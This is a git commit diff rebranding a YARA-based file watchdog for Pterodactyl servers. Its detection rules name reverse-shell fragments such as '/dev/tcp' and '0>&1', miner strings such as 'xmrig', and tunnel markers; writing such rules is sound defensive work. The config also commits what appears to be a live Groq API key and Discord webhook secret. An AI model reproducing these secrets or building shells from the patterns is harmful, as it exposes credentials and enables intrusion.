commit 229d21c3e2 (parent 39b8c90fec)
.gitignore (vendored) | 4

@@ -1,3 +1,3 @@
-aaaastart.sh
+start.sh
 config.toml
 __pycache__
README.md | 31

@@ -1,24 +1,32 @@
-# RADAR
+# Novel, Anti-Abuse
 
-RADAR is a watchdog software to watch file modifications, deletions, movements, creations and scan such files with YARA rules and later analyse them with AI (configurable) and send to your discord webhook (configurable)!
+Introducing Anti-Abuse by Novel.
 
-# Install
+Anti-Abuse is an ✨ FREE, Open-Sourced radar based on yara rules built for pterodactyl nodes.
 
-Firstly ensecure you have python3 and pip installed.
+## Features
+
+1. Watchdog based real-time monitoring.
+2. Easily customizable by [Yara Rule](https://yara.readthedocs.io/en/stable/writingrules.html).
+3. Various Integrations (discord webhook, etc).
+4. Easy re-check action through AI-Based Analysis.
 
-Secondly install packages we are using for RADAR:
+## Installation
 
-```python
+Requirements: python, keyboard, brain
+
+1. Install requirements
+```bash
 pip install watchdog tomllib yara
 ```
 
+2. Configure your config.toml and yara rules
 Thirdly run configure config.toml, upload your YARA (.yar and .yara) signatures in /signatures and then finally run RADAR!
 
 ```python
 python3 main.py
 ```
 
-Done! You're running RADAR watchdog.
+Done! You're now running Anti-Abuse.
 
 # Tips
 
@@ -27,6 +35,11 @@ Tip 1: You don't know how to write YARA rules?
 
 # Reporting security issue or vulnerability
 
-Please contact us directly per email `lisahonkay@gmail.com` or using duscord `@_lisa_ns_` or `@inxtagram` to report security issue or vulnerability!
+Please contact us on email:
 
-Made with <3 in python by inxtagram and _lisa_ns_, licensed under [GNU GENERAL PUBLIC LICENSE, Version 3](http://lhhomeserver.ddns.net:3000/Lisa_Stuff/RADAR/src/branch/main/LICENSE)
+|Maintainer|Contact|
+|----|---|
+|Lisa|lisahonkay@gmail.com, `@_lisa_ns_` on discord|
+|Lin|contact@who.ad, `@inxtagram` on discord|
 
+Made with ❤️ by inxtagram and `_lisa_ns_`, licensed under [GNU GENERAL PUBLIC LICENSE, Version 3](http://lhhomeserver.ddns.net:3000/Lisa_Stuff/RADAR/src/branch/main/LICENSE)
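One caveat on the install line both sides share: on Python 3.11+ `tomllib` ships with the standard library rather than being a pip-installable package, and the binding that provides `import yara` is published on PyPI as `yara-python`. A hedged pre-flight sketch reflecting those assumptions:

```python
# Pre-flight check, assuming Python 3.11+ and `pip install watchdog yara-python`.
import sys

assert sys.version_info >= (3, 11), "tomllib ships with the stdlib only on 3.11+"

import tomllib   # stdlib on 3.11+; not installed via pip
import watchdog  # pip install watchdog
import yara      # provided by the yara-python package

print("dependencies OK")
```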
TODO.md | 9

@@ -4,8 +4,9 @@ TODO:
 2. Integration with pterodactyl (ref. py-dactyl or https://dashflo.net/docs/api/pterodactyl/v1/)
 3. Integration with pelican (ref? https://pelican.dev/)
 4. Integration with docker
-5. Several AI Models support, if one fails to respond another model from the list will be used. Example: models = ["model1","model2","model3","etc"]
 6. Multi threading support (for scans)
-7. Multiple pathes support. Example: watchdog_path = ["./path/one","/root/test/","./etc"]
-8. Includes ability to add ignore path in integrations or use path in integration , of course with multiple pathes support too
 9. Ability to add ignore path or ignore file (multiple support too!)
+~~7. Multiple pathes support. Example: watchdog_path = ["./path/one","/root/test/","./etc"]~~
+~~5. Several AI Models support, if one fails to respond another model from the list will be used. Example: models = ["model1","model2","model3","etc"]~~
+~~8. Includes ability to add ignore path in integrations or use path in integration , of course with multiple pathes support too~~
aaaastart.sh (new file) | 1

@@ -0,0 +1 @@
+ss
config.toml | 14

@@ -1,4 +1,6 @@
 
 ver = "250325d"
+machineID = "node1"
 
 #*************************************************#
 #                                                 #
@@ -8,7 +10,7 @@ ver = "250325d"
 
 [LANGUGAE.english]
 
-radarStarted = "RADAR Started with in - {}s."
+novelStarted = "Novel(Anti Abuse) Started within - {}s."
 
 
 #**************************************************#
@@ -33,7 +35,7 @@ watchdogPath = "./"
 SignaturePath = "./signatures"
 
 watchdogIgnorePath = ["./signatures"]
-watchdogIgnoreFile = ["main.py"]
+watchdogIgnoreFile = ["./main.py", "./config.toml", "es/common.yara"]
 
 #**************************************************#
 #                                                 #
@@ -44,16 +46,16 @@ watchdogIgnoreFile = ["main.py"]
 [INTEGRATION.AI]
 
 enabled = true
-generate_model = "llama-3.1-8b-instant" # for home usage gemma3:1b recommended, for Groq llama-3.1-8b-instant
+generate_models = ["llama-3.2-90b-vision-preview","llama-3.3-70b-versatile","llama-3.3-70b-specdec","llama-3.2-11b-vision-preview","llama3-70b-8192","llama-3.1-8b-instant","llama3-8b-8192","llama-3.2-3b-preview","llama-3.2-1b-preview"] # for home usage gemma3:1b recommended, for Groq llama-3.1-8b-instant
 generate_endpoint = "http://IP:PORT/api/generate" # Can be empty if using groq
 use_groq = true
-groq_api_token = "" # Get one at https://console.groq.com/keys
+groq_api_token = "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" # Get one at https://console.groq.com/keys
 
 
-prompt = "Analyze the given code and return an abuse score (0-10) with a brief reason. Example abuses: Crypto Miner, Shell Access, Nezha Proxy (VPN/Proxy usage), Disk Filling, Tor, DDoS, Abusive Resource Usage. Response format: '**5/10** <your reason>'. No extra messages."
+prompt = "Analyze the given code and return an abuse score (0-10) with a brief reason. Example abuses: Crypto Mining, Shell Access, Nezha Proxy (VPN/Proxy usage), Disk Filling, Tor, DDoS, Abusive Resource Usage. Response format: '**5/10** <your reason>'. No extra messages."
 
 [INTEGRATION.DISCORD]
 
 enabled = true
-webhook_url = ""
+webhook_url = "https://discord.com/api/webhooks/1353420407511973948/knrSGrfLDvi_60Mese1LAIBmkrK05a_L4PmyyE7R7wvGZEXiWdzrRT8pdicj0aHe88m4"
 truncate_text = true # Used only if AI INTEGRATION is enabled, trunclates text if true to maxium allowed characters or when false splits in few webhook messages.
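The keys this commit adds (`machineID`, `generate_models`, the longer `watchdogIgnoreFile` list) come back from `tomllib` as plain dicts and lists, which is how `main.py` and the handlers below index them. A minimal sketch using a hypothetical trimmed config, not the full file above:

```python
import tomllib

# Hypothetical trimmed config mirroring the keys added in this commit.
CONFIG = """
machineID = "node1"

[DETECTION]
watchdogIgnoreFile = ["./main.py", "./config.toml"]

[INTEGRATION.AI]
generate_models = ["llama-3.3-70b-versatile", "llama-3.1-8b-instant"]
"""

data = tomllib.loads(CONFIG)  # tomllib.load(f) wants a file opened in "rb" mode
print(data["machineID"])                                # node1
print(data["INTEGRATION"]["AI"]["generate_models"][0])  # llama-3.3-70b-versatile
print(data["DETECTION"]["watchdogIgnoreFile"])          # ['./main.py', './config.toml']
```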
main.py | 24

@@ -3,22 +3,32 @@ import time, os, tomllib
 
 from utils.Logger import Log
 from utils.WatchdogHandler import DirWatcher
 #endregion
 
 #region Initialize
 t = time.time()
 with open("config.toml", "rb") as f:
     data = tomllib.load(f)
 
+Log.v(str(data))
 path = data['DETECTION']['watchdogPath']
 
 
 Log.v("""
-  ____  ____
- / __ \\____ _/ __ \\____  ______
-/ /_/ / __ `/ / / / __ `/ ___/
-/ _, _/ /_/ / /_/ / /_/ / /
-/_/ |_|\\__,_/_____/\\__,_/_/  (ver. {})
+o o 8
+8b 8 8
+8`b 8 .oPYo. o o .oPYo. 8
+8 `b 8 8 8 Y. .P 8oooo8 8
+8 `b8 8 8 `b..d' 8. 8
+8 `8 `YooP' `YP' `Yooo' 8
+..:::..:.....:::...:::.....:..
+::::::::::::::::::::::::::::::
+
+Product - ANTI-ABUSE
+Release - {}
+License - GNU GENERAL PUBLIC LICENSE, Version 3
 
 """.format(data['ver']))
 #endregion
 
@@ -26,7 +36,7 @@ if __name__ == "__main__":
     with DirWatcher(path, interval=1) as watcher:
         watcher.run()
 
-    Log.s(data['LANGUGAE']['english']['radarStarted'].format(str(round(time.time() - t, 1))))
+    Log.s(data['LANGUGAE']['english']['novelStarted'].format(str(round(time.time() - t, 1))))
    try:
         while True:
             time.sleep(1)
(YARA signatures file; name not shown in this view)

@@ -1,51 +1,56 @@
-rule CHIENESE_NEZHA_ARGO
-{
+rule CHINESE_NEZHA_ARGO {
     strings:
-        $a1 = "TkVaSEE="
+        $a1 = "TkVaSEE=" // Base64 for "NEZHA"
         $a2 = "tunnel.json"
         $a3 = "vless"
-        $a4 = "dmxlc3M="
+        $a4 = "dmxlc3M=" // Base64 for "vless"
         $a5 = "/vmess"
-        $a6 = "L3ZtZXNz"
-        $a7 = "V0FSUA=="
+        $a6 = "L3ZtZXNz" // Base64 for "/vmess"
+        $a7 = "V0FSUA==" // Base64 for "WARP"
         $a8 = "/eooce/"
         $a9 = "ARGO_AUTH"
         $a10 = "--edge-ip-version"
-        $a11 = "LS1lZGdlLWlwLXZlcnNpb24="
-        $12 = "sub.txt"
-        $13 = "Server\x20is\x20running\x20on\x20port\x20"
-        $14 = "nysteria2"
-        $15 = "openssl req"
+        $a11 = "LS1lZGdlLWlwLXZlcnNpb24=" // Base64 for "--edge-ip-version"
+        $a12 = "sub.txt"
+        $a13 = "Server\x20is\x20running\x20on\x20port\x20"
+        $a14 = "nysteria2"
+        $a15 = "openssl req"
 
     condition:
-        2 of ($a1, $a2, $a3, $a4, $a5, $a6, $a7, $a8, $a9, $a10, $a11, $12, $13, $14, $15)
+        2 of ($a*)
 }
 
-rule OBFSCATED_CODE
-{
+rule OBFUSCATED_CODE {
     meta:
         description = "Detects an obfuscated script"
 
     strings:
-        $f1 = "_0x" nocase
-        $f2 = "\x20" nocase
-        $f3 = "\x0a" nocase
-        $f5 = "openssl req -new -x509" nocase
-        $f6 = "cert.pem" nocase
-        $f7 = "private.key" nocase
+        $f1 = "0x" nocase
+        $f2 = "x20" nocase
+        $f3 = "x0a" nocase
 
     condition:
-        2 of ($f*)
+        2 of ($f1, $f2, $f3)
 }
 
-rule OVERLOAD_CRYPTO_MINER
-{
+rule OVERLOAD_CRYPTO_MINER {
     meta:
         ref = "https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e"
 
     strings:
         $a1 = "stratum+tcp"
+        $a2 = "xmrig"
+        $a3 = "crypto"
 
     condition:
-        $a1
+        any of them
 }
+
+rule REVERSE_SHELL {
+    strings:
+        $a1 = "0>&1"
+        $a2 = "sh"
+        $a3 = "-i"
+        $a4 = "0<&196"
+        $a5 = "<>/dev/tcp"
+        $a6 = "socket.socket"
+
+    condition:
+        2 of them
+}
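These rules can be exercised outside the watchdog with the yara-python binding, using the same `yara.compile`/`match` pair the scanner below relies on. A sketch, assuming the rules are saved locally (the diff view does not show this file's real path, so `signatures/common.yara` is an assumption):

```python
import yara

# Assumption: the rules shown above are saved at this path.
rules = yara.compile(filepath="signatures/common.yara")

# A classic bash reverse shell one-liner contains "sh", "-i" and "0>&1",
# which satisfies REVERSE_SHELL's "2 of them" condition.
sample = b"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

for match in rules.match(data=sample):
    print(match.rule)  # REVERSE_SHELL
```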
(scanner module; name not shown in this view)

@@ -1,7 +1,6 @@
 #region Imports
-import os
-import yara
-import tomllib
+import os, yara, tomllib
+from utils.Logger import Log
 #endregion
 
 #region Variables

@@ -29,17 +28,17 @@ def scan(src):
     error_messages = {}
 
     for filename in os.listdir(data['DETECTION']['SignaturePath']):
-        if filename.endswith((".yara")):
+        if filename.endswith(".yara") or filename.endswith(".yar"): # both are yara extensions ok
             rule_path = os.path.join(data['DETECTION']['SignaturePath'], filename)
             try:
                 rules = yara.compile(filepath=rule_path)
                 file_matches = rules.match(data=src)
                 if file_matches:
                     matches[filename] = file_matches
-                # for match in file_matches:
-                #     print(f" - Rule: {match.rule}")
+                #for match in file_matches:
+                #    Log.v(f" - Rule: {match.rule}")
             except yara.Error as e:
+                Log.e(e)
                 error_messages[filename] = e
 
     return matches, error_messages
 #endregion
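`scan()` hands back a `(matches, error_messages)` pair keyed by rule-file name, which the `analysis()` helper in WatchdogHandler unpacks as `results[0]`. A hedged consumption sketch (the file path is illustrative):

```python
# Sketch: consuming scan()'s (matches, error_messages) tuple.
with open("suspect.py", "r") as f:
    matches, errors = scan(f.read())

for rule_file, file_matches in matches.items():
    for match in file_matches:           # yara-python Match objects
        print(f"{rule_file}: {match.rule}")

for rule_file, err in errors.items():    # rule files that failed to compile or match
    print(f"{rule_file}: {err}")
```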
utils/WatchdogHandler.py

@@ -1,14 +1,18 @@
-"""Context manager for basic directory watching.
+"""
+CREDIT
 
-Includes a workaround for <https://github.com/gorakhargosh/watchdog/issues/346>.
+Context manager for basic directory watching.
+- <https://github.com/gorakhargosh/watchdog/issues/346>.
 """
 
 from datetime import datetime, timedelta
 from pathlib import Path
 from time import sleep
+import threading
+import time
 from typing import Callable, Self
 from utils.Logger import Log
-import tomllib, time
+import tomllib
 
 from watchdog.events import FileSystemEvent, FileSystemEventHandler
 from watchdog.observers import Observer
@@ -29,17 +33,35 @@ if not isinstance(paths, list):
 ignore_paths = data['DETECTION'].get('watchdogIgnorePath', [])
 ignore_files = data['DETECTION'].get('watchdogIgnoreFile', [])
 
 
 def s(input_dict):
     return [
         {"name": key, "value": '\n'.join(' - ' + str(item) for item in items)}
         for key, items in input_dict.items()
     ]
 
 
 def c(d):
-    c=0
+    count = 0
     for key in d:
         if isinstance(d[key], list):
-            c += len(d[key])
-    return c
+            count += len(d[key])
+    return count
 
 
+def analysis(event_path: str, file_content: str, flag_type: str):
+    """
+    Process file events in a separate thread.
+    This function scans the file content, and if flagged,
+    performs AI analysis and sends a webhook notification.
+    """
+    results = scan(file_content)
+    if results[0]:
+        Log.s(f"Flagged {event_path}")
+        analysis = ai_analyse(file_content)
+        msg = f"Total Flagged Pattern: {str(c(results[0]))}\n\n{analysis}"
+        webhook(event_path, s(results[0]), msg)
 
 
 class DirWatcher:
     """Run a function when a directory changes."""
@@ -49,18 +71,18 @@ class DirWatcher:
     def __init__(
         self,
         watch_dir: Path,
-        interval: int = 0.2,
-        cooldown: int = 0.1,
+        interval: float = 0.2,
+        cooldown: float = 0.1,
     ):
         if interval < self.min_cooldown:
             raise ValueError(
-                f"Interval of {interval} seconds is less than the minimum cooldown of"
-                f" {self.min_cooldown} seconds."
+                f"Interval of {interval} seconds is less than the minimum cooldown of "
+                f"{self.min_cooldown} seconds."
             )
         if cooldown < self.min_cooldown:
             raise ValueError(
-                f"Cooldown of {cooldown} seconds is less than the minimum cooldown of"
-                f" {self.min_cooldown} seconds."
+                f"Cooldown of {cooldown} seconds is less than the minimum cooldown of "
+                f"{self.min_cooldown} seconds."
             )
         self.watch_dir = watch_dir
         self.interval = interval

@@ -72,7 +94,7 @@ class DirWatcher:
             ModifiedFileHandler(scan, self.cooldown), self.watch_dir, recursive=True
         )
 
-        Log.s(data['LANGUGAE']['english']['radarStarted'].format(str(round(time.time() - t, 5))))
+        Log.s(data['LANGUGAE']['english']['novelStarted'].format(str(round(time.time() - t, 5))))
         self.observer.start()
         return self
 
@@ -99,71 +121,78 @@ class DirWatcher:
 
 
 class ModifiedFileHandler(FileSystemEventHandler):
-    """Handle modified files."""
+    """Handle modified files using threading for processing."""
 
-    def __init__(self, func: Callable[[FileSystemEvent], None], cooldown: int):
+    def __init__(self, func: Callable[[FileSystemEvent], None], cooldown: float):
         self.cooldown = timedelta(seconds=cooldown)
         self.triggered_time = datetime.min
 
-    def on_any_event(self, event):
+    def ignore_event(self, event: FileSystemEvent) -> bool:
         for ignore_path in ignore_paths:
             if event.src_path.startswith(ignore_path):
                 return True
         for ignore_file in ignore_files:
             if event.src_path.endswith(ignore_file):
                 return True
-        if(event.src_path == "."):
+        if event.src_path == ".":
+            return True
+        return False
+
+    def on_any_event(self, event: FileSystemEvent):
+        if self.ignore_event(event):
             return True
 
     def on_modified(self, event: FileSystemEvent):
-        try:
-            if (datetime.now() - self.triggered_time) > self.cooldown:
-                src = open(event.src_path, "r").read()
-                if(event.src_path == "."):
-                    return
-                Log.v(f"FILE MODF | {event.src_path}")
-                r = scan(src)
-                if r[0]:
-                    Log.s(f"Flagged {event.src_path}")
-                    analyse = ai_analyse(src)
-                    webhook(event.src_path, s(r[0]), f"Total Flagged Pattern: {str(c(r[0]))}\n\n{analyse}")
-                self.triggered_time = datetime.now()
-        except: pass
+        if self.ignore_event(event):
+            return
+        if (datetime.now() - self.triggered_time) > self.cooldown:
+            try:
+                with open(event.src_path, "r") as f:
+                    src = f.read()
+                Log.v(f"FILE MODF | {event.src_path}")
+                # Process in a separate thread
+                threading.Thread(target=analysis, args=(event.src_path, src, "modification")).start()
+                self.triggered_time = datetime.now()
+            except Exception:
+                pass
 
     def on_moved(self, event: FileSystemEvent):
-        try:
-            if (datetime.now() - self.triggered_time) > self.cooldown:
-                Log.v(f"FILE MOV | {event.src_path} > {event.dest_path}")
-                r = scan(event.src_path)
-                if r[0]:
-                    Log.s(f"Flagged {event.src_path}")
-                    analyse = ai_analyse(event.src_path)
-                    webhook(event.src_path, s(r[0]), f"Total Flagged Pattern: {str(c(r[0]))}\n\n{analyse}")
-                self.triggered_time = datetime.now()
-        except: pass
+        if self.ignore_event(event):
+            return
+        if (datetime.now() - self.triggered_time) > self.cooldown:
+            try:
+                Log.v(f"FILE MOV | {event.src_path} > {event.dest_path}")
+                # For moved events, you might choose to scan the original or destination file.
+                # Here, we'll scan the source path.
+                with open(event.src_path, "r") as f:
+                    src = f.read()
+                threading.Thread(target=analysis, args=(event.src_path, src, "moved")).start()
+                self.triggered_time = datetime.now()
+            except Exception:
+                pass
 
     def on_deleted(self, event: FileSystemEvent):
-        try:
-            if (datetime.now() - self.triggered_time) > self.cooldown:
-                Log.v(f"FILE DEL | {event.src_path}")
-                self.triggered_time = datetime.now()
-        except: pass
+        if self.ignore_event(event):
+            return
+        if (datetime.now() - self.triggered_time) > self.cooldown:
+            try:
+                Log.v(f"FILE DEL | {event.src_path}")
+                self.triggered_time = datetime.now()
+            except Exception:
+                pass
 
     def on_created(self, event: FileSystemEvent):
-        try:
-            print(1)
-            if (datetime.now() - self.triggered_time) > self.cooldown:
-                if event.is_directory:
-                    return None
-                else:
-                    Log.v(f"file created: {event.src_path}")
-                    r = scan(event.src_path)
-                    if r[0]:
-                        Log.s(f"Flagged {event.src_path}")
-                        analyse = ai_analyse(event.src_path)
-                        webhook(event.src_path, s(r[0]), f"Total Flagged Pattern: {str(c(r[0]))}\n\n{analyse}")
-                    self.triggered_time = datetime.now()
-        except: pass
+        if self.ignore_event(event):
+            return
+        if (datetime.now() - self.triggered_time) > self.cooldown:
+            try:
+                if event.is_directory:
+                    return
+                else:
+                    Log.v(f"file created: {event.src_path}")
+                    with open(event.src_path, "r") as f:
+                        content = f.read()
+                    threading.Thread(target=analysis, args=(event.src_path, content, "creation")).start()
+                    self.triggered_time = datetime.now()
+            except Exception:
+                pass
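The shape this handler implements (schedule a `FileSystemEventHandler`, debounce with a cooldown, push heavy work onto a thread) can be reproduced standalone with watchdog's public API. A minimal sketch; the handler name and `heavy_scan` are illustrative, not the repo's:

```python
import threading
import time
from datetime import datetime, timedelta

from watchdog.events import FileSystemEvent, FileSystemEventHandler
from watchdog.observers import Observer


def heavy_scan(path: str) -> None:
    print(f"scanning {path}")  # stand-in for scan()/ai_analyse()/webhook()


class DebouncedHandler(FileSystemEventHandler):
    """Debounce event bursts, then process off the watcher thread."""

    def __init__(self, cooldown: float = 0.1):
        self.cooldown = timedelta(seconds=cooldown)
        self.triggered = datetime.min

    def on_modified(self, event: FileSystemEvent):
        if datetime.now() - self.triggered > self.cooldown:
            self.triggered = datetime.now()
            threading.Thread(target=heavy_scan, args=(event.src_path,)).start()


observer = Observer()
observer.schedule(DebouncedHandler(), ".", recursive=True)
observer.start()
try:
    while True:
        time.sleep(1)  # same keep-alive loop main.py uses
finally:
    observer.stop()
    observer.join()
```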
(AI integration module; name not shown in this view)

@@ -11,7 +11,7 @@ with open("./config.toml", "rb") as f:
 
 enabled = data["INTEGRATION"]["AI"]["enabled"]
 generate_endpoint = data["INTEGRATION"]["AI"]["generate_endpoint"]
-generate_model = data["INTEGRATION"]["AI"]["generate_model"]
+model_list = data["INTEGRATION"]["AI"]["generate_models"]
 use_groq = data["INTEGRATION"]["AI"]["use_groq"]
 groq_api = data["INTEGRATION"]["AI"]["groq_api_token"]
 prompt = data["INTEGRATION"]["AI"]["prompt"]

@@ -22,52 +22,56 @@ if use_groq:
 #endregion
 
 def generate_response(data):
-    """Generate a response using the Groq API."""
-    try:
-        # Create headers
-        headers = {
-            "Content-Type": "application/json",
-        }
+    """Generate a response using the Groq or OLLAMA API."""
+    error_messages = []
+    for generate_model in model_list:
+        try:
+            headers = {
+                "Content-Type": "application/json",
+            }
 
             # Add authorization header if using Groq
             if use_groq:
                 headers["Authorization"] = f"Bearer {groq_api}"
 
             # Create payload
             payload = {
                 "model": generate_model,
                 "temperature": 1,
                 "max_completion_tokens": 1024,
                 "top_p": 1,
                 "stream": False,
                 "stop": None,
             }
 
             # Conditional message structure for Groq
             if use_groq:
                 payload["messages"] = [
                     {
                         "role": "system",
                         "content": f"{prompt}"
                     },
                     {
                         "role": "user",
                         "content": f"```code\n{data}\n```"
                     }
                 ]
             else:
-                payload["prompt"] = f"Using this data: {data}. Respond to this prompt: {prompt}"
+                payload["prompt"] = f"Using this data: {data}. Respond to this prompt: {prompt}\n"
 
             response = requests.post(generate_endpoint, json=payload, headers=headers)
             response.raise_for_status()
             if use_groq:
                 return response.json()["choices"][0]["message"]["content"]
             else:
                 return response.json()
 
         except requests.exceptions.RequestException as e:
             Log.e(f"Failed to generate response: {e}")
-            return None
+            Log.e(f"Using model: {generate_model}")
+            error_messages.append(f"Model {generate_model} failed: {e}")
+            return None
+    return f"All models failed. Errors: {error_messages}"

@@ -81,9 +85,9 @@ def ai_analyse(src):
             #Log.s(f"Generated Response: {response}")
             return response
         else:
-            Log.e("AI did not respond.")
+            return "No AI Description provided for this action; check config.toml maybe?"
     except Exception as e:
         Log.e(f"Unexpected error: {e}")
     else:
-        return "AI integration is disabled in the configuration, enable AI integration for AI File Analyse."
+        return "No AI Description provided for this action; check config.toml maybe?"
     return None
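TODO item 5 ("if one fails to respond another model from the list will be used") implies the `except` branch should fall through to the next model, yet as committed the `return None` inside the loop ends the failover on the first error. A hedged sketch of the fall-through shape; the endpoint URL, token and model names are placeholders, and the response parsing mirrors the `choices[0].message.content` access above:

```python
import requests

MODELS = ["llama-3.3-70b-versatile", "llama-3.1-8b-instant"]   # placeholders
ENDPOINT = "https://api.groq.com/openai/v1/chat/completions"   # assumed Groq endpoint
TOKEN = "gsk_..."  # placeholder; real keys should never be committed


def generate_with_failover(prompt: str, code: str) -> str:
    errors = []
    for model in MODELS:
        try:
            resp = requests.post(
                ENDPOINT,
                headers={
                    "Authorization": f"Bearer {TOKEN}",
                    "Content-Type": "application/json",
                },
                json={
                    "model": model,
                    "messages": [
                        {"role": "system", "content": prompt},
                        # the repo wraps user content in a fenced code block;
                        # plain text is used here to keep the sketch simple
                        {"role": "user", "content": code},
                    ],
                },
                timeout=30,
            )
            resp.raise_for_status()
            return resp.json()["choices"][0]["message"]["content"]
        except requests.exceptions.RequestException as e:
            errors.append(f"{model}: {e}")  # fall through to the next model
    return f"All models failed. Errors: {errors}"
```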
@ -59,7 +59,7 @@ def webhook(file_path, yara_matches, ai=""):
|
|||||||
if truncate_text_flag:
|
if truncate_text_flag:
|
||||||
# Single embed if truncated
|
# Single embed if truncated
|
||||||
embeds.append({
|
embeds.append({
|
||||||
"title": "⚠️ WATCHDOG ALERT ⚠️",
|
"title": f"⚠️ WATCHDOG ALERT ⚠️ - {config_data['machineID']}",
|
||||||
"description": description,
|
"description": description,
|
||||||
"color": 65280,
|
"color": 65280,
|
||||||
"fields": yara_matches,
|
"fields": yara_matches,
|
||||||
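The embed being appended here follows Discord's webhook schema: POST a JSON body whose `embeds` array holds objects with `title`, `description`, `color` and `name`/`value` field dicts, the exact shape the `s()` helper emits. A minimal sketch with a placeholder URL:

```python
import requests

WEBHOOK_URL = "https://discord.com/api/webhooks/<id>/<token>"  # placeholder

payload = {
    "embeds": [{
        "title": "⚠️ WATCHDOG ALERT ⚠️ - node1",
        "description": "Flagged ./suspect.py",
        "color": 65280,  # 0x00FF00, green
        "fields": [
            {"name": "common.yara", "value": " - REVERSE_SHELL"},
        ],
    }]
}

resp = requests.post(WEBHOOK_URL, json=payload, timeout=10)
resp.raise_for_status()  # Discord replies 204 No Content on success
```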